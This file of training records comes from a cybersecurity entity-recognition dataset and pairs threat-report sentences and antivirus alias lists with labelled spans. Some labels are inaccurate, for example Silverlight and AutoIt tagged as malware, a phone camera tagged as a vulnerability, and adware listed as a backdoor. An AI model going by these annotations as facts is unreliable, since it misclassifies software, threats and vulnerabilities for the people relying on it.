{"text": "A backdoor also known as: W32.WpechkLTD.Trojan Trojan-Spy/W32.Vskim.160256 Trojan.Mauvaise.SL1 Dropper.Dapato.Win32.16801 Trojan/Spy.POSCardStealer.k Win32.Trojan.WisdomEyes.16070401.9500.9904 Backdoor.Trojan BKDR_HESETOX.SMJ Trojan.Win32.Vskim.cqipth Backdoor.Win32.Hesetox.160260 Trojan.DownLoader8.15980 BKDR_HESETOX.SMJ BehavesLike.Win32.Dropper.ch Trojan[Dropper]/Win32.Dapato Backdoor:Win32/Hesetox.A Win-Trojan/Hesetox.160256 TrojanSpy.Vskim Backdoor.Bot.X Backdoor.Win32.Hesetox Win32/Trojan.IM.73c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001025", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.4904 Trojan.Clicker.Delf.CN Trojan.Clicker.Delf.CN Trojan/Clicker.Delf.cn Trojan.Win32.Delf.ifph Trojan.Adclicker TROJ_ADCLICKE.AS Trojan-Clicker.Win32.Delf.cn Trojan.CL.Delf!GHMyZMRoBZw Trojan.Win32.Clicker.197194[h] Troj.Clicker.W32.Delf.cn!c Virus.Win32.Heur.e Trojan.Clicker.Delf.CN Backdoor.Win32.Popwin.~IQ Trojan.Clicker.Delf.CN Trojan.Dasist Trojan.Delf.Win32.8103 TROJ_ADCLICKE.AS BehavesLike.Win32.PWSZbot.cc Trojan/Delf.ab TR/Click.Delf.CN.5 Trojan[Clicker]/Win32.Delf Trojan.Clicker.Delf.CN Win-Trojan/Xema.variant Trojan:Win32/Adcliker.K TrojanClicker.Delf Win32.Trojan.Delf.Lhxa Trojan.Clicker.Delf.CN Clicker.CSA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001027", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Noobot!O Backdoor.Poftsyun Backdoor.W32.Noobot.h!c Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Ecltys Backdoor.Win32.Noobot.h Trojan.Win32.Noobot.ylgzy Backdoor.Win32.A.Noobot.158756 Backdoor.Noobot.Win32.6 BehavesLike.Win32.Downloader.ch Backdoor.Win32.Ecltys W32/Trojan.SKHW-8707 Backdoor/Noobot.d BDS/Noobot.A.14 Backdoor:Win32/Poftsyun.A Backdoor.Win32.Noobot.h Trojan/Win32.Noobot.R214072 Backdoor.Noobot Trojan.Zusy.D49A6 Win32.Backdoor.Noobot.Pfts Backdoor.Noobot!KDSSDgztHWQ W32/Noobot.H!tr.bdr Win32/Trojan.231", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001028", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader.Win32.ChePro.aaa WIN.MACRO.SCRIPT.IRC.WORM.Virus Trojan-Downloader.Win32.ChePro.aaa PUP/Win32.Avdownloader.C2126268", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001030", "source": "cyner2_train"}}
{"text": "Threat actors keep taking advantage of the tax season in the US, using tax-related phishing scams to US-based victims to infect systems with stealthy malware.", "spans": {"THREAT_ACTOR: Threat actors": [[0, 13]], "ORGANIZATION: US-based victims": [[101, 117]], "SYSTEM: infect systems": [[121, 135]], "MALWARE: malware.": [[150, 158]]}, "info": {"id": "cyner2_train_001031", "source": "cyner2_train"}}
{"text": "In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE 2017-0199.", "spans": {"VULNERABILITY: exploited the Microsoft Windows vulnerability": [[64, 109]]}, "info": {"id": "cyner2_train_001032", "source": "cyner2_train"}}
{"text": "These threats are usually exacerbated by the further abuse of legitimate tools such as PowerShell, or script automation utility AutoIt. It's thus not surprising that we discovered an information stealer employing LNK files, which our sensors detected in Israeli hospitals.", "spans": {"MALWARE: threats": [[6, 13]], "MALWARE: AutoIt.": [[128, 135]], "ORGANIZATION: Israeli hospitals.": [[254, 272]]}, "info": {"id": "cyner2_train_001034", "source": "cyner2_train"}}
{"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment .", "spans": {}, "info": {"id": "cyner2_train_001036", "source": "cyner2_train"}}
{"text": "The campaign was found to have delivered several types of malware including Redline Stealer, AgentTesla, Eternity, Blackmoon and Philadelphia Ransomware.", "spans": {"THREAT_ACTOR: The campaign": [[0, 12]], "MALWARE: malware": [[58, 65]], "MALWARE: Redline Stealer, AgentTesla, Eternity, Blackmoon": [[76, 124]], "MALWARE: Philadelphia Ransomware.": [[129, 153]]}, "info": {"id": "cyner2_train_001037", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Otwyacal.C Win32.Trojan.WisdomEyes.16070401.9500.9748 W32.Wapomi.C!inf Win.Trojan.Vjadtre-6170948-0 Win32.HLLP.Protil.1 BehavesLike.Win32.Virut.ch W32/Jadtre.C Trojan.Symmi.D4E83 Trj/CI.A Win32/Wapomi.Z Virus.Win32.Wapomi.a Exploit.Win32.ShellCode", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001038", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Msil Trojan.Kazy.D4D672 TrojanDownloader:MSIL/Winpud.A Trojan/Win32.Inject.C149530 Win32/Trojan.a9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001039", "source": "cyner2_train"}}
{"text": "However, the attacks against targets in the Middle East except Israel were renewed in less than 20 days.", "spans": {}, "info": {"id": "cyner2_train_001041", "source": "cyner2_train"}}
{"text": "rename .APK Android application package files used to install the malicious apps,", "spans": {"SYSTEM: Android application package": [[12, 39]], "MALWARE: malicious apps,": [[66, 81]]}, "info": {"id": "cyner2_train_001042", "source": "cyner2_train"}}
{"text": "Malicious code was appended to the compromised script file, which redirected a visitor.", "spans": {"MALWARE: Malicious code": [[0, 14]]}, "info": {"id": "cyner2_train_001043", "source": "cyner2_train"}}
{"text": "The backdoor provided an alternative foothold in several observed instances for the group and employed a few tricks like using the Intel SSE extended instruction set to avoid emulation and obscure analysis.", "spans": {"MALWARE: The backdoor": [[0, 12]], "ORGANIZATION: group": [[84, 89]], "VULNERABILITY: the Intel SSE extended instruction set": [[127, 165]]}, "info": {"id": "cyner2_train_001044", "source": "cyner2_train"}}
{"text": "The malware uses the Tor anonymity network for command and control C2 and does not require network connectivity to encrypt files, which complicates detection, prevention, and remediation.", "spans": {"MALWARE: malware": [[4, 11]]}, "info": {"id": "cyner2_train_001045", "source": "cyner2_train"}}
{"text": "The list of vulnerable devices, as well as the logins and passwords that go with them, are stored on the server belonging to the cybercriminals.", "spans": {"VULNERABILITY: vulnerable devices,": [[12, 31]], "VULNERABILITY: logins": [[47, 53]], "VULNERABILITY: passwords": [[58, 67]], "SYSTEM: the server": [[101, 111]], "THREAT_ACTOR: cybercriminals.": [[129, 144]]}, "info": {"id": "cyner2_train_001047", "source": "cyner2_train"}}
{"text": "NexusLogger is a cloud-based keylogger that uses the Microsoft .NET Framework and has a low level of sophistication.", "spans": {"MALWARE: NexusLogger": [[0, 11]], "MALWARE: cloud-based keylogger": [[17, 38]], "SYSTEM: Microsoft .NET Framework": [[53, 77]]}, "info": {"id": "cyner2_train_001048", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.CC Packed.Win32.CPEX-based!O Backdoor.PePatch.Win32.2676 Trojan.Crypt.CC W32/Trojan.GQIB-3577 TrojanSpy.KeyLogger Trojan.Win32.Llac.laav Trojan.Win32.CPEXbased.oyaq Trojan.Win32.Buzus.589824[UPX] Packer.W32.CPEX-based.kZ3Y Trojan.Crypt.CC Trojan.PWS.Lineage.4319 BehavesLike.Win32.PUPXAO.dh W32/Trojan2.ANIR Trojan/Buzus.afzu TR/Dldr.Buzus.dhk Trojan[Packed]/Win32.CPEX-based TrojanDropper:Win32/Sharke.C Trojan.Crypt.CC Trojan.Win32.Llac.laav Trojan.Crypt.CC Trojan/Win32.Buzus.C22005 Trojan.Crypt.CC Trojan.Crypt.CC HackTool.Win32.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001049", "source": "cyner2_train"}}
{"text": "The URLs for Sundown requests for Flash files end in .swf, while Silverlight requests end in .xap.", "spans": {"MALWARE: Sundown": [[13, 20]], "MALWARE: Silverlight": [[65, 76]]}, "info": {"id": "cyner2_train_001050", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Trojan Trojan.Win32.Mlw.euwoug Backdoor:Win32/DarkEnergy.A!bit Backdoor.Bot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001051", "source": "cyner2_train"}}
{"text": "After laying low for a few years, it had a sudden resurgence last May.", "spans": {}, "info": {"id": "cyner2_train_001052", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Surabaya.Worm Worm.Win32.AutoRun!O Worm.SillyShare.EE2 W32/Pitin.worm Worm.AutoRun W32.W.AutoRun.luA8 WORM_VB.DTH Win32.Trojan.VB.iy W32/Worm.BGBK W32.SillyFDC Win32/Dodaykil.B WORM_VB.DTH Win.Worm.VB-632 Worm.Win32.AutoRun.bant Trojan.Win32.AutoRun.cnwrek Trojan.Win32.Autorun.40960.R Worm.Win32.VB.~E Win32.HLLW.Autoruner.874 Virus.VB.Win32.86 BehavesLike.Win32.Dropper.ch Worm.Win32.AutoRun W32/Worm.DPLM-0673 Worm/AutoRun.tyn TR/VB.aei Worm/Win32.AutoRun Trojan.Heur.E9EB80 Worm.Win32.AutoRun.bant Worm:Win32/SillyShareCopy.E HEUR/Fakon.mwf SScope.Trojan.VBO.0348 Trj/Yabarasu.A Worm.Pitin Win32/VB.DG Trojan.Win32.Autorun.bep Worm.SillyShareCopy!GFdqFqCX45w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001054", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Dropper.MM W97M/Dropper.x W97M/Mdropper.G W2KM_FAREIT.IAV Trojan.Script.Drop.dyxcgh Trojan-Dropper:W97M/MaliciousDoc.A Trojan.PWS.Stealer.4118 W2KM_FAREIT.IAV W97M/Mdropper.G TR/Crypt.Xpack.310779 Trojan[PSW]/Win32.Fareit TrojanPSW.Fareit possible-Threat.Embedded.ExeInOffice virus.office.qexvmc.1100", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001055", "source": "cyner2_train"}}
{"text": "Operation Groundbait Russian: Прикормка, Prikormka is an ongoing cyber-surveillance", "spans": {"THREAT_ACTOR: Operation Groundbait": [[0, 20]], "THREAT_ACTOR: Прикормка, Prikormka": [[30, 50]]}, "info": {"id": "cyner2_train_001056", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.849 W97M.Downloader.BLR Troj.Downloader.Msoffice!c W97M.Downloader W2KM_HANCITOR.YYSYN VB:Trojan.Valyria.849 VB:Trojan.Valyria.849 Trojan.Script.Downloader.espmja VB:Trojan.Valyria.849 VB:Trojan.Valyria.849 W2KM_HANCITOR.YYSYN TrojanDownloader:O97M/Damatak.A VB:Trojan.Valyria.849 virus.office.qexvmc.1080", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001068", "source": "cyner2_train"}}
{"text": "Volexity has tied this attack campaign to an advanced persistent threat APT group first identified as OceanLotus by SkyEye Labs in 2015.", "spans": {"ORGANIZATION: Volexity": [[0, 8]], "THREAT_ACTOR: attack campaign": [[23, 38]], "THREAT_ACTOR: advanced persistent threat APT group": [[45, 81]], "THREAT_ACTOR: OceanLotus": [[102, 112]], "ORGANIZATION: SkyEye Labs": [[116, 127]]}, "info": {"id": "cyner2_train_001070", "source": "cyner2_train"}}
{"text": "Probably, attackers used web site vulnerabilities for placing malicious files.", "spans": {"THREAT_ACTOR: attackers": [[10, 19]], "VULNERABILITY: vulnerabilities": [[34, 49]]}, "info": {"id": "cyner2_train_001071", "source": "cyner2_train"}}
{"text": "Since our previous publication, we have found another, similar but different payload used to target a second organization in Saudi Arabia that was configured to wipe systems twelve days later on November 29, 2016.", "spans": {"MALWARE: payload": [[77, 84]], "SYSTEM: wipe systems": [[161, 173]]}, "info": {"id": "cyner2_train_001072", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Losya.gg Trojan-Ransom.Win32.Losya.gg Trojan-Ransom.Win32.Losya!IK Trojan.Winlock.2932 Trojan/Losya.cs Trojan:Win32/LockScreen.BA Hoax.Losya.bd Trojan-Ransom.Win32.Losya W32/Krap.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001073", "source": "cyner2_train"}}
{"text": "Servers of The Left in German Bundestag have been infected with malware, apparently by a state-sponsored group of Russian origin.", "spans": {"SYSTEM: Servers of The Left": [[0, 19]], "MALWARE: malware,": [[64, 72]], "THREAT_ACTOR: state-sponsored group": [[89, 110]]}, "info": {"id": "cyner2_train_001074", "source": "cyner2_train"}}
{"text": "Sakula also leverages single-byte XOR encoding to obfuscate various strings and files embedded in the resource section, which are subsequently used for User Account Control UAC bypass on both 32 and 64-bit systems.", "spans": {"MALWARE: Sakula": [[0, 6]], "SYSTEM: 32 and 64-bit systems.": [[192, 214]]}, "info": {"id": "cyner2_train_001075", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.ICQNuker.19456 Trojan.ICQNuker!jj+ciDVRnhs Hacktool.Nuker Smalltroj.EAH TROJ_ICQNUKER.A Trojan.ICQNuker Trojan.Win32.ICQNuker Trojan.Win32.ICQNuker Trojan.Win32.ICQNuker.dhzl TrojWare.Win32.ICQNuker Trojan.Win32.ICQNuker Trojan.ICQNuker TROJ_ICQNUKER.A Trojan/Win32.ICQNuker Trojan.Win32.ICQNuker.19456 Trojan.Win32.ICQNuker Win32.Trojan.ICQNuker Hacktool.Nuker", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001077", "source": "cyner2_train"}}
{"text": "Linux malware is slowly becoming more popular.", "spans": {"MALWARE: malware": [[6, 13]]}, "info": {"id": "cyner2_train_001078", "source": "cyner2_train"}}
{"text": "This porn clicker Trojan, which we detect as Android/Clicker, has once more become available for download from Play Store.", "spans": {"MALWARE: porn clicker Trojan,": [[5, 25]], "SYSTEM: Play Store.": [[111, 122]]}, "info": {"id": "cyner2_train_001079", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.LoadAdv.ABV Trojan.Piptea Downloader.Small.Win32.11983 Trojan.Downloader.LoadAdv.ABV Multi.Threats.InArchive W32/Downldr2.FZLV Trojan.Dropper Win.Downloader.65024-1 Trojan-Downloader.Win32.Small.agns Trojan.Downloader.LoadAdv.ABV Trojan.Win32.Small.bcwtvk Trojan.Win32.Downloader.246584 Trojan.Downloader.LoadAdv.ABV W32/Downloader.UPFZ-7129 Trojan[Downloader]/Win32.Small Trojan:Win32/Piptea.E Trojan-Downloader.Win32.Small.agns Trojan.DL.Small!mUFJjjvpkTw Email-Worm.Win32.Joleee Win32/Trojan.8ed", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001080", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Adclicker.DH Trojan-Clicker.Win32.Small!O Trojan/Clicker.Small.tc Trojan.Zusy.D730F Win32.Trojan.WisdomEyes.16070401.9500.9905 W32/Trojan.HWTO-6812 Trojan.KillAV Win32/TrojanClicker.Small.QZ TROJ_CLICKER.UU Win.Trojan.Clicker-1328 Trojan.Win32.Small.pbsu Trojan.Win32.Clicker.20480.C TrojWare.Win32.TrojanClicker.Small.QZ Trojan.PWS.Gamania.16782 Trojan.Small.Win32.16009 W32/Trojan2.AUEO TrojanClicker.Small.aps W32.Email.Worm.Silly TR/Click.Mon.1 Trojan[Clicker]/Win32.Small Dropper/Win32.Small.R41509 TrojanClicker.Small Trj/CI.A Trojan-Downloader.Win32.Small W32/CLICKER.UU!tr Win32/Trojan.d06", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001081", "source": "cyner2_train"}}
{"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device ’ s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox ’ s report on the SpyNote RAT ’ s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , which was leaked last year .", "spans": {"MALWARE: SpyNote RAT": [[0, 11], [390, 401], [540, 551]], "ORGANIZATION: Netflix": [[450, 457]]}, "info": {"id": "cyner2_train_001085", "source": "cyner2_train"}}
{"text": "The details we are releasing are to provide insight into attack methodologies being employed by sophisticated groups such as FIN7 who are consistently changing techniques between attacks to avoid detection.", "spans": {"THREAT_ACTOR: groups": [[110, 116]], "THREAT_ACTOR: FIN7": [[125, 129]]}, "info": {"id": "cyner2_train_001086", "source": "cyner2_train"}}
{"text": "The Dyre group, a major malware spam producer, has changed their initial malware dropper to utilize Microsoft Word document macros instead of the usual executable types, such as .exe files contained in a .zip.", "spans": {"THREAT_ACTOR: The Dyre group,": [[0, 15]], "MALWARE: malware dropper": [[73, 88]], "SYSTEM: Microsoft Word document macros": [[100, 130]]}, "info": {"id": "cyner2_train_001087", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Shieldcrypt.R00WC0DEQ17 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Ransom.WTYO-5087 Ransom.Troldesh Ransom_Shieldcrypt.R00WC0DEQ17 Win32.Trojan-Ransom.Filecoder.BO Trojan.Win32.Encoder.ephyjr Trojan.Encoder.11787 Ransom:Win32/Shieldcrypt.A Trj/GdSda.A Win32.Trojan.Raas.Auto Trojan-Ransom.Shieldcrypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001088", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Backdoor2.DBLT WS.Reputation.1 Win32.TRVirtl HackTool.Patcher!7MmWKbVM2EE Tool.DVTPatch TR/Virtl.7341 Trojan/Virtl.b Win32.HACKTOOL.pocomail.cx.kcloud W32/Backdoor2.DBLT Trojan.Virtl.7341", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001089", "source": "cyner2_train"}}
{"text": "IOC s for the Wildifre ransomware", "spans": {"MALWARE: Wildifre ransomware": [[14, 33]]}, "info": {"id": "cyner2_train_001090", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/PinkBlocker.arw Trojan.Heloag BKDR_HELOAG.SM PUA.Packed.ASPack BDS/Heloag.A.30 BKDR_HELOAG.SM Backdoor.Win32.Heloag!IK Backdoor:Win32/Heloag.A Trojan.Heloag Backdoor.Win32.Heloag Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001091", "source": "cyner2_train"}}
{"text": "Symantec discovered the Greenbug cyberespionage group during its investigation into previous attacks involving W32.Disttrack.B aka Shamoon.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Greenbug cyberespionage group": [[24, 53]], "THREAT_ACTOR: Shamoon.": [[131, 139]]}, "info": {"id": "cyner2_train_001092", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Rbot!O Backdoor.Rbot.20414 Win32.Trojan.WisdomEyes.16070401.9500.9964 Win.Trojan.Mybot-4324 Trojan.Win32.Rbot.cuqnmc Win32.HLLW.MyBot.based Backdoor.RBot.Win32.38765 BehavesLike.Win32.Msposer.jz Backdoor.Win32.SdBot EXP/DameWare.ggg Trojan[Backdoor]/Win32.Rbot Win32.Hack.RBotT.a.83968 Backdoor.Win32.Sdbot.yx W32/SdBot.IT!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001095", "source": "cyner2_train"}}
{"text": "Cylance SPEAR has uncovered a long-standing persistent threat targeting numerous major industries spread across Japan, South Korea, the United States, Europe, and several other Southeast Asian countries.", "spans": {"ORGANIZATION: Cylance SPEAR": [[0, 13]], "THREAT_ACTOR: persistent threat": [[44, 61]], "ORGANIZATION: industries": [[87, 97]]}, "info": {"id": "cyner2_train_001096", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Script Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Drop.etdypm Trojan.MulDrop7.42636 BehavesLike.Win32.Dropper.fh W32/Trojan.EURA-7093 Trojan:VBS/Sminager.D Exploit.UACSkip Trj/CI.A Exploit.UACSkip! Win32/Trojan.Downloader.251", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001098", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.424D Virus.Hupigon.Win32.5 Trojan/PSW.QQShou.is TSPY_QQSHOU.GY Win32.Trojan.WisdomEyes.16070401.9500.9956 W32/Trojan.KBAU-5151 Trojan.PWS.QQPass TSPY_QQSHOU.GY Backdoor.Win32.Hupigon.vpk Trojan.Win32.QQShou.lofh Backdoor.W32.Rbot.lgxa Backdoor.Win32.Popwin.~IQ Trojan.PWS.Gamania.5830 W32/Trojan.LGV Trojan/PSW.QQShou.eu Trojan[Backdoor]/Win32.Hupigon.vpk PWS:Win32/Whoran.A Backdoor.Win32.Hupigon.vpk Trojan.PWS.QQShou!NqwrJPeZllY W32/Hupigon.VPK!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001099", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Rotbrow.KK6 PUP.Optional.BProtector Trojan.Bromngr.Win32.445 Win32.Adware.Bprotector.a Adware.GoonSquad Win.Adware.BProtector-1 Win32.Application.BHO.A Trojan.Win32.BGuard.cunxgw Application.Win32.bProtector.KA Adware.BGuard.47 Trojan-Dropper.Win32.Rotbrow Trojan.Bromngr.ed W32.Adware.Installbrain Trojan.Adware.BHO.Bprotector.1 TrojanDropper:Win32/Rotbrow.A W32/Bprotect.B!tr Trj/CI.A Win32/Trojan.10d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001103", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kryptik.ASES Trojan.MulDrop1.32726 Win32/Tnega.CZG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001104", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Crypt.Delf.AL Worm/W32.G_Spot.200704 Backdoor.G_Spot.r8 W32/Grandspot.worm!p2p Trojan.Crypt.Delf.AL W32/G_Spot.c Trojan.Win32.GSpot.dzdidh W32.HLLW.Sambut Win32/GrandSpot.C BKDR_GSPOT.15 P2P-Worm.Win32.G_Spot.c Worm.P2P.G_Spot!iWsciEZCFG4 W32.W.G_Spot.c!c Trojan-Downloader.win32.Delf.xoq Trojan.Crypt.Delf.AL Worm.Win32.GrandSpot.C Trojan.Crypt.Delf.AL WIN.WORM.Virus Worm.GSpot.Win32.1 BKDR_GSPOT.15 BehavesLike.Win32.Eggnog.ch Worm/Sramota.qs BDS/GSpot.15.Srv W32/G_Spot.C Trojan[Backdoor]/Win32.G_Spot Trojan.Crypt.Delf.AL Win32/KorGameHack.worm.200704 Worm:Win32/Gespo.C Win32/Spotbot.15 Worm.G_Spot Trojan-PWS.Win32.Lmir.mw Trojan.Crypt.Delf.AL Worm/Gspot.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001107", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.Exetemp!O W32/Backdoor.GJUL-4537 TROJ_DROPER.SMJN Trojan-Dropper.Win32.Exetemp.a Troj.Dropper.W32.Exetemp.tnGD Trojan.MulDrop.30795 TROJ_DROPER.SMJN W32/Backdoor2.FAQY Backdoor/Huigezi.2009.api W32.Trojan.Exetemp Trojan[Dropper]/Win32.Exetemp TrojanDropper:Win32/Exetemp.A!bit Trojan.Graftor.D45DD Trojan-Dropper.Win32.Exetemp.a TrojanDropper.Exetemp Trojan.DL.Win32.Small.grn W32/Exetemp.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001108", "source": "cyner2_train"}}
{"text": "Hydrochasma, the threat actor behind this campaign, has not been linked to any previously identified group, but appears to have a possible interest in industries that may be involved in COVID-19-related treatments or vaccines.", "spans": {"THREAT_ACTOR: Hydrochasma, the threat actor": [[0, 29]], "THREAT_ACTOR: campaign,": [[42, 51]], "THREAT_ACTOR: group,": [[101, 107]], "ORGANIZATION: industries": [[151, 161]]}, "info": {"id": "cyner2_train_001109", "source": "cyner2_train"}}
{"text": "The malware is usually packaged with apps that users may download from third-party app stores.", "spans": {"MALWARE: The malware": [[0, 11]], "SYSTEM: apps": [[37, 41]], "SYSTEM: third-party app stores.": [[71, 94]]}, "info": {"id": "cyner2_train_001110", "source": "cyner2_train"}}
{"text": "Analysis from cyintanalysis.com describing infrastructure of an actor using PoisonIvy and PlugX implants.", "spans": {"ORGANIZATION: cyintanalysis.com": [[14, 31]], "SYSTEM: infrastructure": [[43, 57]], "THREAT_ACTOR: actor": [[64, 69]], "MALWARE: PoisonIvy": [[76, 85]], "MALWARE: PlugX implants.": [[90, 105]]}, "info": {"id": "cyner2_train_001111", "source": "cyner2_train"}}
{"text": "Once infected, Mansoor's phone would have become a digital spy in his pocket, capable of employing his iPhone's camera and microphone to snoop on activity in the vicinity of the device, recording his WhatsApp and Viber calls, logging messages sent in mobile chat apps, and tracking his movements.", "spans": {"SYSTEM: phone": [[25, 30]], "SYSTEM: a digital spy": [[49, 62]], "VULNERABILITY: iPhone's camera": [[103, 118]], "VULNERABILITY: microphone": [[123, 133]], "SYSTEM: WhatsApp": [[200, 208]], "SYSTEM: Viber calls,": [[213, 225]], "SYSTEM: mobile chat apps,": [[251, 268]]}, "info": {"id": "cyner2_train_001112", "source": "cyner2_train"}}
{"text": "Once installed, it hides itself and then tricks the user into typing his or her credentials into fake bank web pages that have been injected onto the device's screen.", "spans": {"SYSTEM: the device's screen.": [[146, 166]]}, "info": {"id": "cyner2_train_001113", "source": "cyner2_train"}}
{"text": "It requires root privileges to be installed, and relies on: A userland binary, providing an encrypted backdoor with remote code execution and proxy functionalities A lightweight Linux Loadable Kernel Module, providing an additional port-knocking service for the userland backdoor", "spans": {"MALWARE: encrypted backdoor": [[92, 110]], "SYSTEM: lightweight Linux Loadable Kernel Module,": [[166, 207]], "SYSTEM: port-knocking service": [[232, 253]], "MALWARE: backdoor": [[271, 279]]}, "info": {"id": "cyner2_train_001117", "source": "cyner2_train"}}
{"text": "Recently, FortiGuard Labs found a phishing campaign targeting French Nationals.", "spans": {"ORGANIZATION: FortiGuard Labs": [[10, 25]], "THREAT_ACTOR: a phishing campaign": [[32, 51]], "ORGANIZATION: French Nationals.": [[62, 79]]}, "info": {"id": "cyner2_train_001119", "source": "cyner2_train"}}
{"text": "Palo Alto Networks has discovered a previously unknown remote access Trojan RAT that has been active for over two years.", "spans": {"ORGANIZATION: Palo Alto Networks": [[0, 18]], "MALWARE: unknown remote access Trojan RAT": [[47, 79]]}, "info": {"id": "cyner2_train_001120", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 TROJ_ETERNALROM.A TROJ_ETERNALROM.A Win32.Exploit.EqEternalRomance.A Exploit.Win32.ShadowBrokers.aj Exploit.Win32.ShadowBrokers.epajub Exploit.Win32.ShadowBrokers.~ Trojan.Equation.37 Exploit.ShadowBrokers.Win32.13 Trojan.Exploit.Equation Exploit.ShadowBrokers.v W32.Hacktool.Equation TR/Eqtonex.HG Trojan[Exploit]/Win32.ShadowBrokers Uds.Dangerousobject.Multi!c Exploit.Win32.ShadowBrokers.aj Exploit:Win32/Eqtonex.A Trojan/Win32.ShadowBrokers.C1919146 Exploit.ShadowBrokers Trj/CI.A Win32/Exploit.Equation.EternalRomance.A HackTool.Win32.ShadowB.a Exploit.ShadowBrokers! Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001121", "source": "cyner2_train"}}
{"text": "The Corebot malware family is relatively new and was first documented by Security Intelligence.", "spans": {"MALWARE: The Corebot malware family": [[0, 26]], "ORGANIZATION: Security Intelligence.": [[73, 95]]}, "info": {"id": "cyner2_train_001122", "source": "cyner2_train"}}
